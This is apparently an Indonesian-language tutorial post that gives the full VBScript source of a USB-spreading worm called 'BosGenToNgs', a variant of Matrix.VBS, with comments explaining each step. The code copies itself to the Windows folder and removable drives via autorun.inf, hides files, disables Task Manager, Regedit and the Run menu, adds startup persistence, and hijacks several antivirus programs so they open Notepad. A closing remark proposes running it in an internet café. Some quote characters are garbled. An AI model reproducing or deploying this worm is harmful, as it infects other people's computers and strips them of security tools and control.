===========================================================================
PEMBUATAN VIRUS DENGAN EKSTENSION .VBS <simpan dengan
nama bosgentongs.exe.vbs>
===========================================================================
‘//BosGenToNgs ITS Ver 2
‘//Varian dari Matrix.VBS
‘//INI VIRUS BERBAHAYA JANGAN CUBA MAIN-MAIN!!!!!
‘//Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian
lanjutkan kegiatan virus//
on error resume next
‘//Dim kata-kata berikut ini//
dim mysource,winpath,flashdrive,fs,mf,atr,tf,bosgentongs,nt,check,sd
‘//Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information AliAss atr AutoruN//
atr = “[autorun]” & vbcrlf & “shellexecute=wscript.exe bosgentongs.exe.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
mysource = mysource & text.readline
mysource = mysource & vbcrlf
loop
do
‘//Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)//
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\batch- bosgentongs.exe.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\batch- bosgentongs.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\batch- bosgentongs.exe.vbs “)
tf.attributes = 39
‘//Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok//
‘//Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket//
for each flashdrive in fs.drives
‘//Cek Drive//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\ //
set tf=fs.getfile(flashdrive.path &”\bosgentongs.exe.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\bosgentongs.exe.vbs “,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\bosgentongs.exe.vbs “)
tf.attributes = 39
‘//Buat Atorun.inf yang teks-nya tadi sudah datrapkan (Auto Setup Information)//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//Manipulasi Registry//
set bosgentongs = createobject(”WScript.Shell”)
‘//Manip – Ubah Title Internet Explorer menjadi THE bosgentongs v.s. Viruz//
bosgentongs.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE bosgentongs v.s. Viruz“
‘//Manip – Set agar file hidden tidak ditampilkan di Explorer//
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced \Hidden”,2,“REG_DWORD”
‘//Manip – Hilangkan aliaz blokir menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager//
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD”
‘//Manip – Disable klik kanan//
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD”
‘//Manip – Munculkan Pesan Setiap Windows Startup//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Bosgentongs:No Cry No wOman”
bosgentongs.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”Worm bosgentongs. Variant from Viruz Sex Bebass, don’t panic all data are safe.”
‘//Manip – Aktif setiap Windows Startup//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, winpath & “\batch- bosgentongs.exe.vbs “
‘//Manip – Ubah Registered Owner dan Obosgentongsanization//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredObosgentongsanization”, “The Matrix EvoLution”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”bosgentongs”
‘//Manip – Membuat Cadangan di sistem svchost, MS32Dll dan membuat ikon//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\bosgentongs.exe.vbs”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
bosgentongs.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3”
‘//Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ansav.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SM?RTP.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Smadav.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe\Debugger”,”notepad.exe”
‘//New Bonus//
if check <> 1 then
Wscript.sleep 100000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run winpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
do while year(now) >= 2009
WScript.sleep 20000
mending coba d net gan...
jdi kgax kna dampak virus ke kom sndiri